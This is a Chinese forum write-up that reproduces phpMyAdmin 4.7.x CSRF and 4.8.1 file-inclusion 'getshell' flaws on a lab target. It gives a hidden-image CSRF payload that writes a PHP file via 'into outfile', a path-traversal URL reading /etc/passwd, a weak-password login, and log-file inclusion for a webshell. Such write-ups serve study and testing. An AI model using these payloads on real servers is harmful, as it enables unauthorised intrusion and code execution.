phpMyAdmin 漏洞复现

Track-mss   ·   发表于 2021-08-24 16:49:01   ·   CTF&WP专版

0X01 phpMyAdmin 4.7.x CSRF 复现

此实验最好使用火狐浏览器进行复现,因为Chrome自带站点隔离的安全机制,对该漏洞复现有一定的影响。

进入phpmyadmin管理页面,需登录

该版本pma存在CSRF漏洞,攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。因为我们扮演的便是管理员角色,所以直接访问本地构造好的恶意页面(下方给出POC):

根据我们在poc中设定好的文件写入位置(目前只赋权给了poc中地址),访问php文件:

可见成功运行了恶意代码,写入了测试文件。

poc:

  1. <p>Hello World</p>
  2. <img src="此处为pma靶场网址/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/usr/share/nginx/html/[自定义名称,谨防重复].php';" style="display:none;" />

0x02 phpmyadmin v4.8.1 后台getshell

使用一波phpmyadmin的弱口令,root/123456成功登进后台

访问:
http://[靶场url]:81/index.php?target=db_datadict.php%253f/../../../../../../../../../etc/passwd

利用方式也比较简单,可以执行一下 SELECT ‘<?php phpinfo()?>’;

到phpmyadmin后台后,getshell方法还很多,比如利用改变写入的日志的路径,写入我们的一句话木马,
首先呢,介绍两个MySQL全局变量(general_log、general_log file)

  • general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
  • general log file 指的是日志的保存路径

http://[靶场url]:81/index.php?target=db_datadict.php%253f/../../../../../../../../..//var/lib/mysql/eaeaef53e506.log

成功getshell。

打赏我,让我更有动力~

0 Reply   |  Until 2021-8-24 | 1089 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.